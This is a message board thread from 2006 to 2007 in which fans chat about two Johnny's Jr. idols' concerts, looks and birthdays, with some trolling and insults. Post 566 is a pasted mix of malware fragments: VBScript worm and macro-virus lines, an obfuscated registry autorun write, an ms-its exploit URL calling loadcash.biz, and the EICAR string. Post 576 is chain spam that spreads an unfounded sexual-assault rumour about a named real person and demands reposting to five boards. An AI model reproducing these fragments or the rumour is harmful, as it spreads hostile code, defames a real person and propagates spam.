夏なのでここらで一句

ストパーの
期限は短く
もう天パ

432 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/19(水) 21:33:04
さむい

433 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/20(木) 01:03:53
ウナの頭は自前?パーマ?

434 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/20(木) 15:00:21
懐かしいなおい

435 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/20(木) 15:47:21
ウナ昔の顔に戻ってきた?

436 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/20(木) 16:13:00
アイプチも
期限は短く
もうヒトエ

437 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/20(木) 16:28:22
ウナの顔がなんかすごく異国人でした

438 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/20(木) 23:37:07


439 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/21(金) 16:18:45
あげとくね

440 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/21(金) 16:21:24
まさかこんな雑魚担どもが暴れてるとは気づかなかった

441 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/21(金) 16:24:04
しつけー性格直せ雑魚ども!!

442 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/21(金) 16:33:13



443 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/21(金) 18:06:20
baka

444 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 01:16:47
こんな過疎スレにまで八つ当たりとは(w
どんだけ不憫担なのかと

445 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 01:25:28
pgr

446 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 01:26:19
八つ当たりと思える脳味噌wwwwwwwwwwwww

447 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 02:04:51
じゃ八つ当たり以外の何wwwwwww

448 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 02:06:30
反応あるまで壺に張り付いてる気の毒なヤシ

449 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 02:38:05
ここにいたのか基地がい

450 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 02:39:05
>448
反応しなきゃ気が済まない馬鹿っぽさ

451 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 03:25:59
                ,.,;.∴;.,ヽ   ;.;∴;.      ____.∧_∧
             ∴。'.('<_`<*) (M;;    ____/_____/(´∀` )┓ヽ三 三,,ヾ⌒三,´⌒(⌒三((⌒三 三
               )(,:::  ;・∴つて;;※;//。'O/  ̄ 。| ̄ ̄- |] ̄`ヽ;;  三´(、;(⌒三⌒;/⌒三 三 三 三
                 )O  ノ⌒.;W;┌――┐__ l⌒ll__.|__---イ_l⌒llノ 三(⌒(::/';;'〜三´(⌒三 三 三 三 三
                   U  ~   `--' ̄ ̄ ̄`--' `--' ̄ ̄ `--'((⌒ 

452 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 16:14:06
足のAAスレにいる荒しと同一?

453 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 18:46:35
ここのウマシカが荒らし叩き売やめたらageるのやめてやるよ

454 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/22(土) 22:27:56
イミフ

455 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/23(日) 00:52:58
>453
                ,.,;.∴;.,ヽ   ;.;∴;.      ____.∧_∧ 意味ワカンネーヨ
             ∴。'.('<_`<*) (M;;    ____/_____/(´∀` )┓ヽ三 三,,ヾ⌒三,´⌒(⌒三((⌒三 三
               )(,:::  ;・∴つて;;※;//。'O/  ̄ 。| ̄ ̄- |] ̄`ヽ;;  三´(、;(⌒三⌒;/⌒三 三 三 三
                 )O  ノ⌒.;W;┌――┐__ l⌒ll__.|__---イ_l⌒llノ 三(⌒(::/';;'〜三´(⌒三 三 三 三 三
                   U  ~   `--' ̄ ̄ ̄`--' `--' ̄ ̄ `--'((⌒ 


456 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/23(日) 01:15:52



457 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/24(月) 01:37:15
ウナチャン艦長おめ(w
チャン禿バロス

458 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/24(月) 01:44:00
       

459 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/24(月) 15:58:51
kitigaiage

460 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/24(月) 16:02:23
どんだけ脊髄反射なんだかwwwwwwwwww

461 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/24(月) 16:52:36
ぃょ━━━━━ヽ(=゚ω゚)人(゚ω゚=)ノ━━━━━ぅ kitigaiに乗っ取られおめ!AGE

462 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/24(月) 16:57:46
http://hobby7.2ch.net/rail/ ☆☆I★N★G★進行形

463 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/24(月) 17:34:08
m9(^Д^)プギャーーーッ

464 :板名・LR議論中@ユーは裏Jr板自治スレへ:2006/07/25(火) 03:25:25
ぷ。

465 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 02:23:22
チャン:三回
ウナ:三回

466 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 21:36:58
カラーダーガーオモイ>( = ゝ = )  ('<_`<) <カラーダガーカルイ

467 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 00:06:53
痩せたんじゃなかったのか?

468 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 11:43:52
痩せてなお重いとはこれいかに

469 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 14:42:08
ウナ的には痩せたが
チャンと比べるとまだ重いって事かな(w

470 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 15:33:51
ウナとチャンの体型を比べるなんて仕事と恋人を比べるようなものだから比較にならない

471 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 23:25:38
ウナが重いのかチャンが軽いのか

卵が先かニワトリが先かってことですね

472 :465:2006/07/29(土) 23:43:58
ただ書いてみたかっただけだスマソ

473 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 23:44:42
466だった_| ̄|○

474 :名無し・LR議論中@ユーは自治スレへ:2006/07/30(日) 01:41:26
>473
姐さん丼舞(w
和むレスありがトン

475 :名無し・LR議論中@ユーは自治スレへ:2006/07/30(日) 08:10:54
>473
いや姐さんのレスで哲学的なことまで考えたし無問題だ(´∀`*)

476 :ユーは名無しネ:2006/07/30(日) 13:20:21
きもい

477 :ユーは名無しネ:2006/07/30(日) 18:19:15
超 (`へ′)b キモチイー!デス!!

478 :ユーは名無しネ:2006/07/30(日) 19:53:17
ちょっとゑ様(w

479 :ユーは名無しネ:2006/07/31(月) 01:48:08
チャン:5回
ウナ:4回
チャン…合掌(w

480 :ユーは名無しネ:2006/07/31(月) 04:39:28
産まれたての小鹿のようなチャン
キャワすぎて震える

481 :ユーは名無しネ:2006/07/31(月) 10:18:25
……

482 :ユーは名無しネ:2006/07/31(月) 14:19:13
昨日は艦長が干菓子にやられて「やられた方の気持ちがわかった」とか言ってたけど今後は手加減してくれるのかな

483 :ユーは名無しネ:2006/07/31(月) 19:42:16
カンチョーモエス

484 :ユーは名無しネ:2006/08/02(水) 23:19:37
チャンってもしかしてトロいのか?

485 :ユーは名無しネ:2006/08/03(木) 01:48:14
 |ニニつ
 |   /
 |_>`) < ダレモイナイ.....オドルナライマノウチ。
 |⊂
 |

     (二二ニニつ
      ヽ    /
       ('<_`;)|  < キノコノコーノコゲンキノコ♪
     ⊂|.  .υ|
       |    |
       ヽ _⊃
        U"

     (二二ニニつ
      ヽ    /
       |(;'_>`) < エリンギ マイタケ ブナシメジ♪
       |ц  |つ
       |    |
      ⊂ _ノ
        "U

     (二二ニニつ
      ヽ    /
       ('<_`;)|  < キノコノコーノコゲンキノコ♪
     ⊂|.  .υ|
       |    |
       ヽ _⊃
        U"

 | ミ  サッ!   
 | 

486 :ユーは名無しネ:2006/08/03(木) 01:49:02
 

487 :ユーは名無しネ:2006/08/03(木) 02:33:11
>484
100%爽カモネ

488 :ユーは名無しネ:2006/08/03(木) 21:52:34
トロイというよりぼーっとしてるんじゃないか?

489 :ユーは名無しネ:2006/08/04(金) 11:14:50
おっとりしてる

490 :ユーは名無しネ:2006/08/04(金) 23:09:02
むっちりしてる

491 :ユーは名無しネ:2006/08/05(土) 00:06:53
のはもちろんウナ

492 :ユーは名無しネ:2006/08/05(土) 22:32:38
泣くなよバーカー(w

493 :ユーは名無しネ:2006/08/07(月) 01:26:19
PZで失念してたがチャンスレどうするんだ?

494 :ユーは名無しネ:2006/08/07(月) 09:11:23
自分はこのスレがあるからいいかなと思ってる
ここがある限り立てようとすれば立てられる訳だし

495 :ユーは名無しネ:2006/08/08(火) 11:12:24
艦長アリガトウゴザイマシタ!!なのか(w
ウナチャンも乙克も乙皆乙

496 :ユーは名無しネ:2006/08/13(日) 19:46:28
2人の髪形気になる木

497 :ユーは名無しネ:2006/08/13(日) 23:04:50
ウナホッ様で帽子浮いてるよウナ

498 :ユーは名無しネ:2006/08/14(月) 00:06:44
あまり「よい子のみんな」な髪型ではなさそうな予感

499 :ユーは名無しネ:2006/08/14(月) 10:56:33
よい子じゃないから
運動会には出ないよねどうせ

500 :ユーは名無しネ:2006/08/14(月) 11:35:44
10月1日だったら広島なんじゃ

501 :ユーは名無しネ:2006/08/14(月) 21:27:41
十六夜の時中に白タンク着てたっけ?
自分入ったとき着てなかった気がするんだが

502 :ユーは名無しネ:2006/08/14(月) 22:00:38
後半は確実に着てなかった

503 :ユーは名無しネ:2006/08/15(火) 08:46:19
途中から着なくなった
まだDVDゲトしてないんだがタンクバージョン?

504 :ユーは名無しネ:2006/08/15(火) 23:46:38
チャンスレってこのまま放置でいいのか?

505 :ユーは名無しネ:2006/08/16(水) 09:46:08
>501
確か新潟から着てなかったはず

506 :ユーは名無しネ:2006/08/16(水) 18:32:51
つ紺の内容はどのスレでしてるの?

507 :ユーは名無しネ:2006/08/16(水) 19:38:47
去年の紺スレ継続

508 :ユーは名無しネ:2006/08/20(日) 23:59:10
>505
d
ツアー最初の帝都では着てたってことだよな?
自分帝都も入ったのに着てなかった気がしてたよ

509 :ユーは名無しネ:2006/08/22(火) 00:07:15
最初は着てたけどどっかから脱いでた
どこぞのブログのレポ漁ればすぐ分かるんじゃないの

510 :ユーは名無しネ:2006/08/22(火) 12:46:33
ウナが腰痛めてたの気づかなかったよウナorz

511 :ユーは名無しネ:2006/08/26(土) 12:38:13
今日はウナ腰の調子いいといいな

512 :ユーは名無しネ:2006/08/26(土) 23:02:36
チャンの髑髏Tシャツにもワロタが
前に居るオバーチャンも微笑ましい
夏の夜の某所の写真かな

513 :ユーは名無しネ:2006/08/27(日) 00:04:37
チャンの顔の輪郭も髑髏っぽくTシャツにマッチ(w
頬肉ハタチまでに戻るかな

514 :ユーは名無しネ:2006/08/27(日) 01:14:07
ウナ髪型すごかったな

515 :ユーは名無しネ:2006/08/27(日) 01:17:49
髪形kwsk

516 :ユーは名無しネ:2006/08/27(日) 08:47:39
先週と変わらず雷様じゃなかったか?

517 :ユーは名無しネ:2006/08/27(日) 13:47:09
先週以上に雷様

518 :ユーは名無しネ:2006/08/27(日) 17:40:10
雷様…orz
パーマなのか天然なのか

519 :ユーは名無しネ:2006/08/27(日) 21:16:46
水パーマ

520 :ユーは名無しネ:2006/08/27(日) 23:39:43
先週より帽子が浮いてなかった気がしたのは錯覚かな

521 :ユーは名無しネ:2006/08/28(月) 21:54:44
ウナ帽子の下にバンダナ巻いてる?

522 :ユーは名無しネ:2006/08/29(火) 12:31:42
ウナチャンあらちついてる?

523 :ユーは名無しネ:2006/08/29(火) 12:58:00
ついてる
フリ入ってない曲もありチャンが左右キョロキョロしてた
ウナの髪は落ち着いてきたモヨン

524 :ユーは名無しネ:2006/08/29(火) 15:16:51
チャンがフリ入ってないとか珍しいな

525 :ユーは名無しネ:2006/08/29(火) 15:34:18
え?

526 :ユーは名無しネ:2006/08/29(火) 15:55:27
チャンが振り入ってないなんて
キョロキョロするチャンを見てみたい気もする

527 :ユーは名無しネ:2006/08/29(火) 17:31:12
チャン2部は完璧に踊れてたよ
ウチワ使った振りするウナチャンがキャワ

528 :ユーは名無しネ:2006/08/29(火) 17:43:27
メインと花道にしかコナスorz
花道はウナ上手チャン下手

529 :ユーは名無しネ:2006/08/29(火) 18:02:57
レポd!
今からチケ探して入るべきか悩む

530 :ユーは名無しネ:2006/08/29(火) 21:59:30
チケ探すならアリEFがオススメ
メインステが見切れていたとしても近さが重要
そういえば最初の衣装の青いシャツの裾が捲れまくり
見切れ席からはチャンのお腹がよく見えたよ(w

531 :ユーは名無しネ:2006/08/29(火) 23:23:40
後先考えずしゅうまいまできたがチケがないorz

532 :ユーは名無しネ:2006/08/30(水) 00:48:44
3部で枕前に他メンが立ち位置移動してるのにチャンはボーっと立ってた
チャンどうしたのチャン

533 :ユーは名無しネ:2006/08/30(水) 01:02:33
きっと宇宙から何か受信してたんだよ

534 :ユーは名無しネ:2006/08/30(水) 01:09:23
なるほど

535 :ユーは名無しネ:2006/08/30(水) 02:34:46
((((('<_`<))))) 何か不思議な電波が送られてきています

536 :ユーは名無しネ:2006/08/30(水) 02:47:22
チャン
冥王星に帰っちゃうの?チャン

537 :ユーは名無しネ:2006/08/30(水) 03:57:39
ウナが還る星はウドン星か?

538 :ユーは名無しネ:2006/08/30(水) 04:17:17
ウナは雷様じゃないのウナ

539 :ユーは名無しネ:2006/08/30(水) 09:30:33
ウナは雲の上の人よねウナ

540 :ユーは名無しネ:2006/08/30(水) 09:35:00
MC中に他の窓がアオペダの衣裳持ってきてあらちに着せてる間
ウナチャンアフォモが3人固まってポツーンとしてるのがなんかキャワ

541 :ユーは名無しネ:2006/09/03(日) 01:51:41
ノッポさんを煽るチャンって(w

542 :ユーは名無しネ:2006/09/03(日) 08:27:06
めんたいチャンダイヤモンド不在orz
あと挨拶の手繋ぎの順番が変わってた
福茶チャン古紙ウナまーたんだった気がする

1部MCでチャンネタ
前日皆でモツ鍋を食べに行ったけどつバンド付近にチャンも座ってて
チャンはビズ系バンドのボーカルっぽいしバンドみたいだったよと
2部ホッサマで2回目に登場するときウナと福茶が凄い勢いで走ってて
チャンがチョト怯えてた(w
3回目登場するときはウナと福茶が手を繋いで登場して客席キャー
ウナが福茶の手を掴んでひっぱってる感じ

ウナチャンテンソン高かったし一緒に腰振ったり客席煽ったりしててキャワだた


543 :ユーは名無しネ:2006/09/03(日) 13:36:20
工エエェェ(´д`)ェェエエ工
チャンどうしたんだろう・・・ただの人数合わせだといいんだけど
それにしてもキャワなウナチャン見れて禿裏山
二人でテンソン高いってあんまりないもんな

544 :ユーは名無しネ:2006/09/03(日) 18:49:38
>543
ラブタフからは普通に出てきたから人数あわせだとは思う


545 :ユーは名無しネ:2006/09/04(月) 20:38:14
1部でチャンがノッポさんを煽ってたの知ってるから
2部でノッポさんをほぼ同じ位置でみつけたときのウナが
ヤバイヤバイ…!!ってひとり大爆笑しててワロタ

546 :ユーは名無しネ:2006/09/04(月) 20:53:57
ノッポさんて誰?

547 :ユーは名無しネ:2006/09/04(月) 22:29:55
めんたい一部OPのダンスでウナのダンスがあまりにヒドスでどうしたのかと心配したよ
あらちあけで緊張してたのかだんだん戻ってヨカタけど
最後の方チャンが福茶と下手で後ろのほうのヲタと壊れてたのが和んだ

548 :ユーは名無しネ:2006/09/22(金) 19:43:02
北国のウナは見ててバロスだった
久しぶりにあんなテンソン高いウナ見たよw
最前とかのヲタにもちゃんとかまってたな
チャンは男ヲタとのやり合いが禿楽しそうw

549 :ユーは名無しネ:2006/09/25(月) 15:25:48
牛舌はウナよりチャソのテンションが凄かったな
男ヲタの煽りも濃厚な投げチューも何回も見た気がする

550 :ユーは名無しネ:2006/09/25(月) 16:34:10
>549
男オタへの濃厚な投げチューかとオモタ(w
確かにチャンのテンションスゴス
くまなくフロアを見ててファンサしまくり
ホッサマ後はける時も両手ピースで禿高くジャンプしてた

551 :ユーは名無しネ:2006/09/25(月) 16:39:30
チャンの投げチュ、ちょっとあっさりになったと思ったんだが…
いつももっとねばっこくないか?

552 :ユーは名無しネ:2006/09/25(月) 16:47:27
>551
牛タンは濃さよりも回数優先してた気がする(w
自分はフォーラムぶりに見たんだが
フォーラム時よりウナの髪が綺麗にまとまってるように見えた

553 :ユーは名無しネ:2006/09/25(月) 18:16:41
お手振り曲だけじゃなくてそうだね前とか
わずかな時間も使ってファンサするチャソバロスwwww
昨日の2部はピースして投げチューして慌てて踊ってたな

554 :ユーは名無しネ:2006/09/26(火) 20:25:42
>551
口すんごいとんがらしてたり舌出してたり舐めてたりいろいろ
コレは濃いのかアッサリなのか?

555 :ユーは名無しネ:2006/09/26(火) 23:10:47
>554
それは濃いだろう

556 :ユーは名無しネ:2006/10/01(日) 09:17:17
1部深青でウナチャンが二人同じ動きで客煽ってた
最初チョト二人離れてたのが段々近付いてってキャワ
2部は窓愛病で通り過がりにチャンがウナの前に立って
二人で腰振っててモエス

鼓笛隊はウナが小太鼓
チャンがなんかを吹いてた

あとチャンの爪は黒率タカス

557 :ユーは名無しネ:2006/10/02(月) 00:13:34
チャン二十歳オメ!
ウナと一緒にこれからもがんがって呉

558 :ユーは名無しネ:2006/10/02(月) 09:14:55
チャン生日オメ!
大学と仕事の両立は大変だろうけどガンガレ

559 :ユーは名無しネ:2006/10/02(月) 13:41:39
チャン生日オメ!
チャンの19歳はつ紺で始まりつ紺で終わったいい一年だったな

名古屋ウナが元気なさそうに見えたのは自分だけ?

560 :ユーは名無しネ:2006/10/02(月) 15:13:46
チャン生日オメ!
ハタチのチャンにいっぱい会えるといいな

鯛会報にチャンだけソロでワンカット載っててウマー
ちなみに冷凍人間のやつ

561 :ユーは名無しネ:2006/10/02(月) 19:42:33
チャン生日オメ!
前日だたからかテンソン高かったよね

オーラスでウナ泣いてたの?

562 :ユーは名無しネ:2006/10/02(月) 20:07:51
チャンハピバ!
チャンのファンサ凄いな自担にも見習って欲シス

563 :ユーは名無しネ:2006/10/02(月) 20:23:07
>559
自分もウナ調子悪そうだなと思ったよ
泣いてるとかじゃないけど目がずっと潤んでる感じがした
それがかえってイロポかったけどw


チャン20歳オメ!

564 :ユーは名無しネ:2006/10/03(火) 06:32:34
1日遅れちゃったけどチャソ生日&成人おめ!

565 :ユーは名無しネ:2006/10/07(土) 16:57:54
つ紺終わっちゃったから次会えるのはいつだろう
最近仕事続きだったから贅沢になってきてるorz

566 :<body onload=window()>:2006/10/08(日) 02:06:18
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


567 :ユーは名無しネ:2006/10/08(日) 10:38:00
雑誌で枝がウナの名前出してる
長電話するほど仲良しなのか

568 :ユーは名無しネ:2006/10/09(月) 10:24:28
ウナ話が長そう

569 :ユーは名無しネ:2006/10/09(月) 19:04:57
ユニ内ニート組の絆

570 :ユーは名無しネ:2006/10/11(水) 15:51:38
去年の衝撃メンに追加参加ってアリエナスだよなないよな

571 :ユーは名無しネ:2006/10/12(木) 00:51:34
まあもし参加することになっても衝撃の価格が下がってるから
あとからでもチケ入手しやすそうだけどね
自分で何口申し込むか悩みどころだ

572 :ユーは名無しネ:2006/10/15(日) 14:09:46
ゐからのメールにあった百式出演者のカトーはカトーでもどうせ(ry

573 :ユーは名無しネ:2006/10/15(日) 17:38:16
あのカトーくんかもと一瞬夢を見た(w

574 :ユーは名無しネ:2006/10/20(金) 05:35:30
ふ〜ん、玄米ビスケットがあるのにね

575 :ユーは名無しネ:2006/10/20(金) 10:28:04
玄米ビスケットなんかウナは光の速さで完食

576 :ユーは名無しネ:2006/10/21(土) 23:57:02
みんな聞いて!!最近仁が仁の彼女とHしたんだって。
しかもコンサート中にディープKISSしたんだよ。
コンサート終わった後に仁が彼女を会場の奥に連れ込んで無理やりHしたんだって。彼女は嫌がったんだけど胸を揉んだりなめたりして凄かったんだって。
帰りの電車の中でも触ったりしたんだってさ。
そのときの画像がhttp://jin-kita/sah13802100dah-hsex
コレは他の掲示板に5箇所以上にコピペしないと見れません。
コレは他と違って本物だよ!わたしも嘘かと思ってやってみたけど見れちゃった!!仁のいっちゃった顔とかまじやばい!!仁のアソコも超ドアップたったの45秒だけどだけどスゴイよ。
でもちゃんと違う掲示板に5箇所コピペしないと見れないよ

577 :ユーは名無しネ:2006/10/23(月) 22:17:28
五ヵ所以上に貼ってみたのにご馳走が現れず空腹なウナ。

578 :ユーは名無しネ:2006/10/27(金) 13:16:20
そういえば最近ゴホゴホしてないな…と思うチャン。

579 :ユーは名無しネ:2006/11/07(火) 19:11:35
ウナ太ったな

580 :ユーは名無しネ:2006/11/08(水) 02:12:16
仕事ナイカラピザッチャウンジャナイノ…

581 :ユーは名無しネ:2006/11/08(水) 09:15:09
ウナチャン8周年オメオメ!
8年目はいろいろ盛り沢山だったけど
9年目も仕事に恵まれるといいな

582 :ユーは名無しネ:2006/11/08(水) 11:32:22
八周年オメ!

583 :ユーは名無しネ:2006/11/09(木) 00:34:03
すぎちゃったけど8周年オメ!古紙もだな


584 :ユーは名無しネ:2006/11/12(日) 22:25:03
ウナチャンは年明けのあらちにつくよね?

585 :ユーは名無しネ:2006/11/13(月) 02:18:25
祈りなさい

586 :ユーは名無しネ:2006/11/18(土) 17:49:06
なむはんにゃはらみたじ

587 :ユーは名無しネ:2006/11/19(日) 07:05:14
アーメンソーメンタンメン

588 :ユーは名無しネ:2006/11/19(日) 11:07:40
エコエコアザラク

589 :ユーは名無しネ:2006/11/21(火) 12:56:17
ウナウナアザラク

590 :ユーは名無しネ:2006/11/23(木) 15:43:17
ウナウナアザラシ

591 :ユーは名無しネ:2006/11/24(金) 01:46:41
ケサランパサラン

592 :ユーは名無しネ:2006/11/24(金) 18:05:49
衝撃ズニア発表されたな
ウナチャンはどっちなのか

593 :ユーは名無しネ:2006/11/24(金) 18:08:56
どっちだろうな
滝つはないと思ってるからいいとして
あらちだったら激戦ぽいし

594 :ユーは名無しネ:2006/11/24(金) 21:09:32
例年通りなら衝撃は4人しか出ないから
ウナチャンはあらち紺だと思ってる

595 :ユーは名無しネ:2006/11/26(日) 13:32:30
窓スレの流れ的に滝つつくのかとも思ってしまうし
自分が予想してたことに自信がなくなってきたorz

596 :ユーは名無しネ:2006/11/26(日) 14:04:47
もう今なら何でもアリな気がしないでもない

597 :ユーは名無しネ:2006/11/26(日) 15:03:08
自分はとりあえず環八、滝つ、あらち共に横蟻
滝つドサ×4公演振り込んでおいた
どれかにはいると思いたいよ

598 :ユーは名無しネ:2006/11/27(月) 09:27:15
滝つも踊れるだけにないとは言い切れない所がコワス

599 :ユーは名無しネ:2006/11/27(月) 12:57:51
滝つつくなら横蟻もついてホスィ

600 :ユーは名無しネ:2006/11/27(月) 18:12:05
( = ゝ=)600…

601 :ユーは名無しネ:2006/11/28(火) 00:06:51
夕立で窓が出るとか出ないとか言ってたって言うのはケキョークどっちなんだろう

602 :ユーは名無しネ:2006/11/28(火) 01:38:29
ソレハ秘密デス…ゴホッ

603 :ユーは名無しネ:2006/11/29(水) 00:32:59
衝撃が前回と同じ4人なら
あらちアジア紺と関係ないKTは葡萄缶とか

604 :ユーは名無しネ:2006/11/29(水) 11:06:56
>603
ならいいんだけどね
むしろ自分は葡萄館行くからありがたい(w


605 :ユーは名無しネ:2006/11/29(水) 12:53:25
それがいいな
あらちと葡萄缶ハシゴする気だから

606 :ユーは名無しネ:2006/11/29(水) 13:26:13
金銭面的にも一番助かるな

607 :ユーは名無しネ:2006/11/29(水) 23:51:27
もしウナチャンのみ葡萄缶だったら常にバックだよな

608 :ユーは名無しネ:2006/11/30(木) 01:27:34
マイク持ってきたり傘回したりロープ回したり
たまに踊ったりボーッと立ってたりします

609 :ユーは名無しネ:2006/11/30(木) 09:36:41
衣装を着せたり脱がせたりもあるから
ステージにいる時間は意外と長い(w

610 :ユーは名無しネ:2006/11/30(木) 10:10:44
傘回しだけの可能性もあるけどな

611 :ユーは名無しネ:2006/11/30(木) 10:15:21
わからんぞ
意外にズニアがメインだからバックはウナチャンだけでウマーかも

612 :ユーは名無しネ:2006/11/30(木) 13:58:11
出ずっぱりでどんどん痩せていくウナ
いいかもね

613 :ユーは名無しネ:2006/11/30(木) 18:22:06
ゑの着替えを手伝うウナチャンを想像しただけでモエス

614 :ユーは名無しネ:2006/11/30(木) 18:47:50
何故にゑ限定?(w

615 :ユーは名無しネ:2006/12/01(金) 10:17:53
一人じゃ着替えられないのはゑ様だけ(w

616 :ユーは名無しネ:2006/12/01(金) 12:54:42
>614
ここでする話じゃないカモだがヤパリ基地スチだから
ゑと仲良くしてるのはモエス

617 :ユーは名無しネ:2006/12/01(金) 15:31:50
>616
スレチでチラ裏でスマソだがナカーマ

618 :ユーは名無しネ:2006/12/03(日) 15:11:51
( = ゝ=)

619 :ユーは名無しネ:2006/12/03(日) 23:39:56
ウナもしかしてキレてる?

620 :ユーは名無しネ:2006/12/04(月) 12:53:15
( = ゝ=)ノ〃キレてナイッスヨ

621 :ユーは名無しネ:2006/12/06(水) 00:43:19
( = ゝ=)人('<_`<)

622 :ユーは名無しネ:2006/12/06(水) 00:46:18
あらちみたいだね

623 :ユーは名無しネ:2006/12/10(日) 00:16:08
(>`_>')人('<_`<)

624 :ユーは名無しネ:2006/12/10(日) 06:59:59
>623
Σ(゚Д゚)

625 :ユーは名無しネ:2006/12/10(日) 16:35:53
( = ゝ=)人(=< = )

626 :ユーは名無しネ:2006/12/10(日) 17:12:36
キレテルッスヨ(>`_>')人('<_`<)キレテナイッスヨ

627 :ユーは名無しネ:2006/12/18(月) 12:48:09
イナピカってどことなくチャンに似てないか?

628 :ユーは名無しネ:2006/12/20(水) 08:40:57
髪型ジャマイカ?
というか髪型以外は似てないような

629 :ユーは名無しネ:2007/01/02(火) 02:15:09
てか
おすすめ2ちゃんねるに出るくらい見てんなら何か書けよおまいら(w

630 :ユーは名無しネ:2007/01/03(水) 01:36:34
>629
気になってIEで確認しちゃったじゃないか(w
あそこどうしたらいいんだろうな


631 :ユーは名無しネ:2007/01/03(水) 13:44:52
今日参戦する姐さんレポヨロ

632 :ユーは名無しネ:2007/01/05(金) 00:11:08
夏に出てないせいかなんとなく二人アウェー感漂ってた
立ち位置両端多い
平安ソロにもいないのが惜しい

633 :ユーは名無しネ:2007/01/05(金) 05:56:33
ウナ一気に老けたよね

634 :ユーは名無しネ:2007/01/05(金) 13:14:47
アウェー禿同
ウナは丸くなりチャンは痩せてた

635 :ユーは名無しネ:2007/01/05(金) 15:46:22
(  =  ゝ = )人('<_`<<)

636 :ユーは名無しネ:2007/01/06(土) 15:02:55
出番は少なくないのに立ち位置イマイチが多かったな
我儘は言えないが

637 :ユーは名無しネ:2007/01/07(日) 11:08:53
メインステで立ち位置端だとギリギリライトが当たらないんだよな

638 :ユーは名無しネ:2007/01/07(日) 15:57:21
チャソがいない
まさか怪我した?

639 :ユーは名無しネ:2007/01/07(日) 16:08:54
チャン成人式とか?

640 :ユーは名無しネ:2007/01/07(日) 16:37:21
それしかないよね

641 :ユーは名無しネ:2007/01/07(日) 16:52:50
成人式か
まったく考えてなかったorz

642 :ユーは名無しネ:2007/01/07(日) 16:59:07
明日じゃなくて今日が成人式???
なんにせよ怪我じゃないならいいんだがな
あえて式ネタに乗っかって…スーツもチャンコレなんだろうか

643 :ユーは名無しネ:2007/01/07(日) 17:34:15
自分の地元は今日成人式だからありえなくはないかも

スーツでチャンコレってどんなんだろうな
髪は気合い入りまくってそうだが

644 :ユーは名無しネ:2007/01/07(日) 21:09:31
チャン在住市は8日に成人式だぞ

645 :ユーは名無しネ:2007/01/08(月) 00:21:09
オマイは半年ロムった方がいいんじゃないか

646 :ユーは名無しネ:2007/01/09(火) 12:38:41
たこやきウナ誰とシンメ?
チャンの成人式想像するとホストだな

647 :ユーは名無しネ:2007/01/09(火) 13:57:53
チャンが成人式とは
微笑ましいというか感慨深いというか

648 :ユーは名無しネ:2007/01/28(日) 23:11:03
昨日の帝劇ってチャンだけ?ウナチャン?

649 :ユーは名無しネ:2007/01/30(火) 05:05:26
チガウヨ

650 :ユーは名無しネ:2007/01/30(火) 12:59:30
衝撃観覧はチャンショタロンTJ

